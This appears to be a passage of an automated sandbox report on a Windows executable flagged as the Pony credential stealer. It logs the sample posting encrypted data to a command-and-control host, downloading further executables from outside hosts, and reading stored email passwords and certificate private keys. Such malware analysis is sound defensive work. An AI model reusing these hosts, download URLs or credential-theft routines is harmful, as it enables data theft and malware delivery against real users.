Dec 7, 2024 18:28:58.346291065 CET	53	58402	1.1.1.1	192.168.2.4
Dec 7, 2024 18:28:59.610735893 CET	50667	53	192.168.2.4	1.1.1.1
Dec 7, 2024 18:28:59.933289051 CET	53	50667	1.1.1.1	192.168.2.4
Dec 7, 2024 18:28:59.934743881 CET	51509	53	192.168.2.4	1.1.1.1
Dec 7, 2024 18:29:00.350459099 CET	53	51509	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 7, 2024 18:27:00.133063078 CET	192.168.2.4	1.1.1.1	0xc7cc	Standard query (0)	6.magicalomaha.co	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:06.162389040 CET	192.168.2.4	1.1.1.1	0x4043	Standard query (0)	6.magicalomaha.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:11.511539936 CET	192.168.2.4	1.1.1.1	0xdb4a	Standard query (0)	6.magicalomaha.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:16.667769909 CET	192.168.2.4	1.1.1.1	0xb83a	Standard query (0)	6.magicalomaha.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:21.823880911 CET	192.168.2.4	1.1.1.1	0x521b	Standard query (0)	6.magicalomaha.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:26.980133057 CET	192.168.2.4	1.1.1.1	0xde65	Standard query (0)	6.magicalomaha.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:32.137064934 CET	192.168.2.4	1.1.1.1	0xdc3f	Standard query (0)	6.magicalomaha.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:37.292529106 CET	192.168.2.4	1.1.1.1	0x9c02	Standard query (0)	6.magicalomaha.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:42.449079037 CET	192.168.2.4	1.1.1.1	0x18cc	Standard query (0)	6.magicalomaha.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:47.589751959 CET	192.168.2.4	1.1.1.1	0xd082	Standard query (0)	6.magicalomaha.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:52.745841026 CET	192.168.2.4	1.1.1.1	0x86e6	Standard query (0)	6.magicalomaha.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:57.886420965 CET	192.168.2.4	1.1.1.1	0x6c1f	Standard query (0)	6.magicalomaha.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:58.025098085 CET	192.168.2.4	1.1.1.1	0xd262	Standard query (0)	dynamotouren.de	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:59.610735893 CET	192.168.2.4	1.1.1.1	0xb1c3	Standard query (0)	www.dynamotouren.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:59.934743881 CET	192.168.2.4	1.1.1.1	0xd0d0	Standard query (0)	app.bi.com.tr	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 7, 2024 18:27:00.874520063 CET	1.1.1.1	192.168.2.4	0xc7cc	No error (0)	6.magicalomaha.co		208.91.197.44	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:06.506531954 CET	1.1.1.1	192.168.2.4	0x4043	Name error (3)	6.magicalomaha.com	none	none	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:11.652014017 CET	1.1.1.1	192.168.2.4	0xdb4a	Name error (3)	6.magicalomaha.com	none	none	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:16.806974888 CET	1.1.1.1	192.168.2.4	0xb83a	Name error (3)	6.magicalomaha.com	none	none	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:21.961507082 CET	1.1.1.1	192.168.2.4	0x521b	Name error (3)	6.magicalomaha.com	none	none	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:27.119568110 CET	1.1.1.1	192.168.2.4	0xde65	Name error (3)	6.magicalomaha.com	none	none	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:32.277067900 CET	1.1.1.1	192.168.2.4	0xdc3f	Name error (3)	6.magicalomaha.com	none	none	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:37.436367989 CET	1.1.1.1	192.168.2.4	0x9c02	Name error (3)	6.magicalomaha.com	none	none	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:42.586261034 CET	1.1.1.1	192.168.2.4	0x18cc	Name error (3)	6.magicalomaha.com	none	none	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:47.730521917 CET	1.1.1.1	192.168.2.4	0xd082	Name error (3)	6.magicalomaha.com	none	none	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:52.883682966 CET	1.1.1.1	192.168.2.4	0x86e6	Name error (3)	6.magicalomaha.com	none	none	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:58.024211884 CET	1.1.1.1	192.168.2.4	0x6c1f	Name error (3)	6.magicalomaha.com	none	none	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:58.346291065 CET	1.1.1.1	192.168.2.4	0xd262	No error (0)	dynamotouren.de		104.21.17.37	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:58.346291065 CET	1.1.1.1	192.168.2.4	0xd262	No error (0)	dynamotouren.de		172.67.220.132	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:59.933289051 CET	1.1.1.1	192.168.2.4	0xb1c3	No error (0)	www.dynamotouren.com		188.114.97.6	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:28:59.933289051 CET	1.1.1.1	192.168.2.4	0xb1c3	No error (0)	www.dynamotouren.com		188.114.96.6	A (IP address)	IN (0x0001)	false
Dec 7, 2024 18:29:00.350459099 CET	1.1.1.1	192.168.2.4	0xd0d0	Name error (3)	app.bi.com.tr	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

6.magicalomaha.co

dynamotouren.de

www.dynamotouren.com

72.32.185.12

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	208.91.197.44	80	6516	C:\Users\user\Desktop\8WgZHDQckx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 18:27:01.030493021 CET	276	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: 6.magicalomaha.co Accept: / Accept-Encoding: identity, *;q=0 Content-Length: 176 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Dec 7, 2024 18:27:01.150098085 CET	176	OUT	Data Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	208.91.197.44	80	6516	C:\Users\user\Desktop\8WgZHDQckx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 18:27:07.318893909 CET	276	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: 6.magicalomaha.co Accept: / Accept-Encoding: identity, *;q=0 Content-Length: 176 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Dec 7, 2024 18:27:07.438896894 CET	176	OUT	Data Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	208.91.197.44	80	6516	C:\Users\user\Desktop\8WgZHDQckx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 18:27:13.615461111 CET	276	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: 6.magicalomaha.co Accept: / Accept-Encoding: identity, *;q=0 Content-Length: 176 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Dec 7, 2024 18:27:13.735074043 CET	176	OUT	Data Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49736	208.91.197.44	80	6516	C:\Users\user\Desktop\8WgZHDQckx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 18:27:19.927830935 CET	276	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: 6.magicalomaha.co Accept: / Accept-Encoding: identity, *;q=0 Content-Length: 176 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Dec 7, 2024 18:27:20.047744989 CET	176	OUT	Data Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	208.91.197.44	80	6516	C:\Users\user\Desktop\8WgZHDQckx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 18:27:26.240622997 CET	276	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: 6.magicalomaha.co Accept: / Accept-Encoding: identity, *;q=0 Content-Length: 176 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Dec 7, 2024 18:27:26.360110044 CET	176	OUT	Data Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	208.91.197.44	80	6516	C:\Users\user\Desktop\8WgZHDQckx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 18:27:32.538707018 CET	276	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: 6.magicalomaha.co Accept: / Accept-Encoding: identity, *;q=0 Content-Length: 176 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Dec 7, 2024 18:27:32.658251047 CET	176	OUT	Data Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	208.91.197.44	80	6516	C:\Users\user\Desktop\8WgZHDQckx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 18:27:38.834505081 CET	276	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: 6.magicalomaha.co Accept: / Accept-Encoding: identity, *;q=0 Content-Length: 176 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Dec 7, 2024 18:27:38.955339909 CET	176	OUT	Data Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	208.91.197.44	80	6516	C:\Users\user\Desktop\8WgZHDQckx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 18:27:45.131195068 CET	276	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: 6.magicalomaha.co Accept: / Accept-Encoding: identity, *;q=0 Content-Length: 176 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Dec 7, 2024 18:27:45.250772953 CET	176	OUT	Data Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	208.91.197.44	80	6516	C:\Users\user\Desktop\8WgZHDQckx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 18:27:51.412682056 CET	276	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: 6.magicalomaha.co Accept: / Accept-Encoding: identity, *;q=0 Content-Length: 176 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Dec 7, 2024 18:27:51.533770084 CET	176	OUT	Data Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	208.91.197.44	80	6516	C:\Users\user\Desktop\8WgZHDQckx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 18:27:58.193068981 CET	276	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: 6.magicalomaha.co Accept: / Accept-Encoding: identity, *;q=0 Content-Length: 176 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Dec 7, 2024 18:27:58.807048082 CET	176	OUT	Data Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49758	208.91.197.44	80	6516	C:\Users\user\Desktop\8WgZHDQckx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 18:28:04.978049994 CET	276	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: 6.magicalomaha.co Accept: / Accept-Encoding: identity, *;q=0 Content-Length: 176 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Dec 7, 2024 18:28:05.098192930 CET	176	OUT	Data Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49877	104.21.17.37	80	6516	C:\Users\user\Desktop\8WgZHDQckx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 18:28:58.467014074 CET	176	OUT	GET /4XM2f.exe HTTP/1.0 Host: dynamotouren.de Accept: / Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Dec 7, 2024 18:28:59.592813969 CET	1059	IN	HTTP/1.1 301 Moved Permanently Date: Sat, 07 Dec 2024 17:28:59 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Sat, 07 Dec 2024 18:28:59 GMT Location: https://www.dynamotouren.com/?dynamotouren.de Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d1H4IyceFybx1Kdg4uYpOdK2mqdUS2C4wmFyRepL7lQB07Cu4pisK0Wa2Nc5tNCbj0xxiIkxUUZy2MOZmECPKEEYVjqYarD2AQABuYXY6%2BD3X%2FZGLWZ2jV2hz3%2BvXEJW4jo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 8ee63c3b3e19c340-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1984&min_rtt=1984&rtt_var=992&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=176&delivery_rate=0&cwnd=132&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49881	188.114.97.6	443	6516	C:\Users\user\Desktop\8WgZHDQckx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 18:28:59.934055090 CET	188	OUT	GET /?dynamotouren.de HTTP/1.0 Host: www.dynamotouren.com Accept: / Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49883	72.32.185.12	80	6516	C:\Users\user\Desktop\8WgZHDQckx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 18:29:00.470936060 CET	173	OUT	GET /rd7nr.exe HTTP/1.0 Host: 72.32.185.12 Accept: / Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Target ID:	0
Start time:	12:26:58
Start date:	07/12/2024
Path:	C:\Users\user\Desktop\8WgZHDQckx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\8WgZHDQckx.exe"
Imagebase:	0x400000
File size:	381'552 bytes
MD5 hash:	2FBFC79462B64751C339F0B0297C748F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: unknown Rule: pony, Description: Identify Pony, Source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: pony, Description: Identify Pony, Source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: pony, Description: Identify Pony, Source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	29.4%
Dynamic/Decrypted Code Coverage:	25.2%
Signature Coverage:	12.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	39

Executed Functions

Function 0040E9CE Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 174
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E9E1
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EA15
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040ECD0

Strings

PopPassword, xrefs: 0040EAD8
SmtpAccount, xrefs: 0040EB2E
PopServer, xrefs: 0040EA7D
SmtpPassword, xrefs: 0040EB4E
Technology, xrefs: 0040EA62
PopPort, xrefs: 0040EA9D
SmtpServer, xrefs: 0040EAF3
PopAccount, xrefs: 0040EAB8
EmailAddress, xrefs: 0040EA47
SmtpPort, xrefs: 0040EB13

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 1332880857-2111798378
Opcode ID: 785a58eeefe31ad8fbd2d6d96509cd82f682391f0b261f4875770061519bbba3
Instruction ID: 8c726dbd4774d9faecc101f25245ec10e744d92cea1909c51a74287b2a7dd414
Opcode Fuzzy Hash: 785a58eeefe31ad8fbd2d6d96509cd82f682391f0b261f4875770061519bbba3
Instruction Fuzzy Hash: 8071823190011CBADF226F51CC42BDDBAB6BF04704F5485FAB588741B1DB7A5BA1AF88

Function 0040D1E9 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertOpenSystemStoreA.CRYPT32(00000000,00416910), ref: 0040D26F
CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D288
lstrcmpA.KERNEL32(?,2.5.29.37), ref: 0040D2B9

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

lstrcmpA.KERNEL32(?,0041691D,00000000,?,00000000,00000000,?,2.5.29.37), ref: 0040D2F1
CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D30D
CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D325
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D33E
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D363
CryptDestroyKey.ADVAPI32(?), ref: 0040D3A1
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D3AC
CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D3D4

Strings

2.5.29.37, xrefs: 0040D2B2

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
String ID: 2.5.29.37
API String ID: 2649496969-3842544949
Opcode ID: c5114772601b71a796970ff310554d6a2d8f48e332c3122745ba0f371867faaa
Instruction ID: 0743195cb9407e63814cae69e5eae370ec95d05dd175c9e397db8b5294eaa1a5
Opcode Fuzzy Hash: c5114772601b71a796970ff310554d6a2d8f48e332c3122745ba0f371867faaa
Instruction Fuzzy Hash: 28513631900209EBDF21AB91DD09BEEBB71BB44305F108436FA01B51F0DBB99A94DB99

Function 00404CB4 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00404D24
lstrcmpiA.KERNEL32(00415055,?), ref: 00404D4D
lstrcmpiA.KERNEL32(00415057,?), ref: 00404D6A
FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?), ref: 00404E19
FindClose.KERNEL32(?,?,?,?,.ini,00000000,?), ref: 00404E2C

